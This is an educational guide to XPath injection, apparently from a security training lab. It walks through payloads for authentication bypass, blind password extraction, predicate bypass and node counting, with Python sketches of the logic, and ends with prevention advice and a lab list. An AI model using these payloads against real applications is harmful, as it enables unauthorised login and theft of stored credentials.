XPath Injection Guide

Learn how to manipulate XML queries to extract data, bypass authentication, and access restricted information.

🎯 What is XPath?

XPath is a query language for selecting nodes in XML documents. Applications use it to query configuration files, user databases stored as XML, and other structured XML data. XPath Injection occurs when user input is directly concatenated into XPath queries without sanitization.

Common in: Legacy systems, configuration parsing, educational platforms, some APIs.

📄 XPath Basics

XPath queries select nodes from an XML document:

//user[username='admin' and password='secret']

This selects every <user> element whose <username> child equals 'admin' and whose <password> child equals 'secret'. Its parts:

  • //user = any <user> element anywhere in the document
  • [...] = predicate (filter condition)
  • and/or = boolean operators
  • 'value' = string literal
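As a minimal sketch, the query above can be tried with Python's standard library. `xml.etree.ElementTree` supports only a limited XPath subset with no `and`/`or` operators, so the two conditions are written as chained predicates, which likewise require both to hold. The sample XML and its values are hypothetical.

```python
import xml.etree.ElementTree as ET

# Hypothetical user store in the shape this guide assumes.
USERS_XML = """<users>
  <user><username>admin</username><password>secret</password><role>admin</role></user>
  <user><username>alice</username><password>wonderland</password><role>user</role></user>
</users>"""

root = ET.fromstring(USERS_XML)

# ElementTree has no and/or, so "username='admin' and password='secret'"
# becomes two chained predicates; an element must satisfy both to match.
matches = root.findall(".//user[username='admin'][password='secret']")
print([u.findtext("username") for u in matches])  # ['admin']
```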
💥 How XPath Injection Works

When an application builds an XPath query by concatenating user input:

query = "//user[username='" + username + "' and password='" + password + "']"

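An attacker can inject XPath syntax by entering ' or '1'='1 as the username:

//user[username='' or '1'='1' and password='...']

In XPath, and binds more tightly than or, so this predicate reads as username='' or ('1'='1' and password='...') and still depends on the password. Entering the same payload in the password field removes that dependency:

//user[username='' or '1'='1' and password='' or '1'='1']

The final '1'='1' is always true, so every <user> node matches. An application that uses the first result typically logs the attacker in as the first user in the document (usually admin).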
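Because XPath's `and` binds more tightly than `or`, a payload in the username field alone leaves the password check in place; it has to reach the password field too. The minimal Python sketch below shows both cases. `build_login_query` and the two predicate functions are hypothetical helpers, and the predicates are Python models of the XPath predicates for a single `<user>` node, not an XPath engine.

```python
def build_login_query(username: str, password: str) -> str:
    # Vulnerable pattern: input is pasted between the quotes of XPath string literals.
    return "//user[username='" + username + "' and password='" + password + "']"

def username_only_predicate(u: str, p: str) -> bool:
    # Models //user[username='' or '1'='1' and password='wrong'] for a node with children u, p.
    # The parentheses spell out XPath 1.0 precedence: `and` binds tighter than `or`.
    return u == "" or ("1" == "1" and p == "wrong")

def both_fields_predicate(u: str, p: str) -> bool:
    # Models //user[username='' or '1'='1' and password='' or '1'='1'].
    return u == "" or ("1" == "1" and p == "") or "1" == "1"

payload = "' or '1'='1"
print(build_login_query(payload, "wrong"))
# //user[username='' or '1'='1' and password='wrong']
print(build_login_query(payload, payload))
# //user[username='' or '1'='1' and password='' or '1'='1']

node = ("admin", "s3cret")  # hypothetical <user> node: (username, password)
print(username_only_predicate(*node), both_fields_predicate(*node))  # False True
```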

๐Ÿ” Common XPath Injection Attacks
1. Authentication Bypass (Boolean Logic)
Input: ' or '1'='1 (in both the username and password fields)
Query: //user[username='' or '1'='1' and password='' or '1'='1']
Result: Every user node matches and the first one is returned (authentication bypassed)
2. Data Extraction (String Predicates)
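Target: Extract the admin password character by character
Payload (username): admin' and starts-with(password, 'a') or '1'='2
Query: //user[username='admin' and starts-with(password, 'a') or '1'='2' and password='...']
Result: The admin node is returned only if the password starts with 'a'; extend the prefix ('aa', 'ab', ...) one character at a time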
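The character-by-character loop can be sketched as follows, using a username payload of the form admin' and starts-with(password, '<prefix>') or '1'='2. `prefix_oracle` is a hypothetical stand-in for submitting the payload and observing whether the login succeeds; here it just checks a hardcoded secret. All names and the secret are illustrative.

```python
import string

# Hypothetical secret standing in for the admin <password> in the target XML;
# a real tester does not know this value.
_ADMIN_PASSWORD = "s3cret"

def build_prefix_payload(prefix: str) -> str:
    # Username payload: the predicate is true only if admin's password starts with `prefix`.
    return "admin' and starts-with(password, '" + prefix + "') or '1'='2"

def prefix_oracle(payload: str) -> bool:
    # Hypothetical stand-in for a login attempt. It evaluates what the injected predicate
    # would: (username='admin' and starts-with(password, prefix)) or ('1'='2' and ...).
    prefix = payload.split("starts-with(password, '", 1)[1].split("')", 1)[0]
    return _ADMIN_PASSWORD.startswith(prefix)

def extract_password(alphabet: str = string.ascii_letters + string.digits,
                     max_len: int = 64) -> str:
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if prefix_oracle(build_prefix_payload(known + ch)):
                known += ch  # this character extends the known prefix
                break
        else:
            break  # no candidate matched: the whole password is known
    return known

print(extract_password())  # s3cret
```

The alphabet is an assumption: a character outside it (including a quote, which would also break the payload's string literal) ends the search early. XPath 1.0's substring() function supports the same idea one position at a time, for example substring(password, 1, 1)='a'.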
3. Bypassing Restrictions (Predicate Manipulation)
Restricted: //user[role='admin' and status='active']
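Payload (role value): admin' or '1'='1' or role='
Query: //user[role='admin' or '1'='1' or role='' and status='active']
Result: '1'='1' makes the predicate true for every node, so the status='active' check is bypassed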
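A Python model of why the role payload admin' or '1'='1' or role=' defeats the status check. `NODES`, `build_role_query`, and the predicate functions are hypothetical; the predicates mirror the XPath expressions using Python's boolean operators, which share XPath 1.0's precedence (`and` before `or`).

```python
# Hypothetical <user> nodes, reduced to (role, status) pairs.
NODES = [("admin", "active"), ("admin", "disabled"), ("user", "disabled")]

def build_role_query(role: str) -> str:
    # Vulnerable: the role value is pasted into the restricted predicate.
    return "//user[role='" + role + "' and status='active']"

def intended_predicate(role: str, status: str) -> bool:
    # role='admin' and status='active'
    return role == "admin" and status == "active"

def injected_predicate(role: str, status: str) -> bool:
    # role='admin' or '1'='1' or role='' and status='active'
    # Python's `and` binds tighter than `or`, matching XPath 1.0.
    return role == "admin" or "1" == "1" or role == "" and status == "active"

payload = "admin' or '1'='1' or role='"
print(build_role_query(payload))
# //user[role='admin' or '1'='1' or role='' and status='active']
print([n for n in NODES if intended_predicate(*n)])  # [('admin', 'active')]
print([n for n in NODES if injected_predicate(*n)])  # every node in NODES
```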
4. Counting Nodes (count() function)
Payload: ' or count(//user)>5 or 'a'='b
Query: //user[username='' or count(//user)>5 or 'a'='b' and password='...']
Result: Nodes are returned only if the document contains more than 5 users
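Each request with a payload of the form ' or count(//user)>N or 'a'='b answers one yes/no question, so the exact count can be found with a binary search over N instead of trying 1, 2, 3, and so on. A minimal sketch, where `count_oracle` is a hypothetical stand-in for a login attempt and `_USER_COUNT` is an illustrative hidden value:

```python
# Hypothetical: the real number of <user> nodes, unknown to the tester.
_USER_COUNT = 7

def build_count_payload(n: int) -> str:
    # Username payload with the threshold as a parameter.
    return "' or count(//user)>" + str(n) + " or 'a'='b"

def count_oracle(payload: str) -> bool:
    # Hypothetical stand-in for a login attempt: it succeeds exactly when the
    # injected test count(//user) > n is true.
    n = int(payload.split("count(//user)>", 1)[1].split(" ", 1)[0])
    return _USER_COUNT > n

def find_user_count(upper: int = 1024) -> int:
    # Binary search for the smallest n where count(//user) > n is false;
    # that n is the node count (assuming it is at most `upper`).
    lo, hi = 0, upper
    while lo < hi:
        mid = (lo + hi) // 2
        if count_oracle(build_count_payload(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo

print(find_user_count())  # 7
```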
โš ๏ธ Why is XPath Injection Dangerous?
  • Authentication Bypass: Access any account without credentials
  • Data Extraction: Retrieve an entire XML document, one character at a time, with blind boolean queries
  • Privilege Escalation: Assume admin roles or elevated permissions
  • Data Manipulation: XPath queries only read data, but if the application updates the nodes a query selects, injection can change which nodes are modified
  • Information Leakage: Discover document structure and content
๐Ÿ›ก๏ธ How to Prevent XPath Injection
  • Parameterized XPath Queries: Bind input to XPath variables (e.g. //user[username=$name]) through the XPath API instead of concatenating it into the query
  • Input Validation: Whitelist allowed characters and formats
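  • Escape Special Characters: Quotes are what let input break out of a string literal. XPath 1.0 has no escape sequence for them, so either reject ' and " or build the literal with concat(); other metacharacters such as [, ], (, ) matter only if input is placed outside a quoted literal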
  • Use XML Schemas: Validate XML structure before querying
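  • Least Privilege: Query only the document or subtree a feature needs, and keep secrets such as plaintext passwords out of XML that user-facing queries can reach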
  • Web Application Firewall: Detect common XPath payloads
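Where the XPath API supports variables, binding input to them is the cleaner fix: lxml's `xpath()` accepts variable values as keyword arguments, and Java's `javax.xml.xpath` provides `XPathVariableResolver`. When concatenation cannot be avoided, a minimal sketch of allow-list validation plus safe literal quoting might look like this; `USERNAME_RE`, `xpath_literal`, and `build_safe_login_query` are hypothetical names, and the allowed character set is an assumption.

```python
import re

# Hypothetical allow-list: 1 to 64 letters, digits, '_', '.', or '-'.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def is_valid_username(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None

def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 expression that evaluates to exactly `value`.

    XPath 1.0 string literals have no escape sequences, so a value that
    contains both quote characters has to be assembled with concat().
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i > 0:
            pieces.append("\"'\"")  # a literal single quote, wrapped in double quotes
        if part:
            pieces.append("'" + part + "'")  # part contains no single quotes
    return "concat(" + ", ".join(pieces) + ")"

def build_safe_login_query(username: str, password: str) -> str:
    if not is_valid_username(username):
        raise ValueError("invalid username")
    return ("//user[username=" + xpath_literal(username)
            + " and password=" + xpath_literal(password) + "]")

print(build_safe_login_query("alice", "it's"))
# //user[username='alice' and password="it's"]
```

Quoting this way keeps any value inside a string literal, so a password such as ' or '1'='1 is compared as text instead of being parsed as XPath.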
🧪 Lab Progression

Demo: Examine the XML structure and the XPath query format, with hints

Lab 1 - Login Bypass: Use boolean injection to authenticate without a password

Lab 2 - Secret Extraction: Extract hidden admin secrets without using the 'admin' account

Lab 3 - Restricted Predicate Bypass: Bypass additional security restrictions via predicate manipulation